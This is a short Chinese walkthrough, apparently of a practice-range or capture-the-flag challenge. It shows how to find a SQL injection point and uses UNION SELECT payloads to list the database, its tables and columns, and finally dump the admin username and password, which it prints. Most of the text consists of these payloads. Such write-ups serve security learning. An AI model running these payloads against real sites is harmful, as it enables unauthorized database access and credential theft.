第一章:为了女神小芳!
Tips:
通过sql注入拿到管理员密码!
-
寻找注入点,判断是什么注入
|?id=1 and 1=1| 显示正常 |
|-|–|
| ?id=1and 1=2| 页面有变故(存在注入) |
|?id=1’ | 页面有回显但是无法判断注入类型|
|||
-
查看列数及字段数(这里通过二分法可以快速定位列数为2)
-
联合查询(注意前面id为假才会执行后门的联合查询)
|?id=121 union select 1,2 #| 查看回显位置 |
|–|--|
|?id=121 union select 1,database() #| 查看数据库 |
|?id=121 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #| 查看表名 |
|?id=112 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘admin’ #| 查看字段名 |
|?id=112 union select 1,(select group_concat(username,0x3a,password) from admin) #|查询字段值 |
回显位置:2
数据库名:maoshe
表名:admin,dir,new,xss(猜测表明为admin)
字段名:id,uesename,password
账号密码:admin:hellohack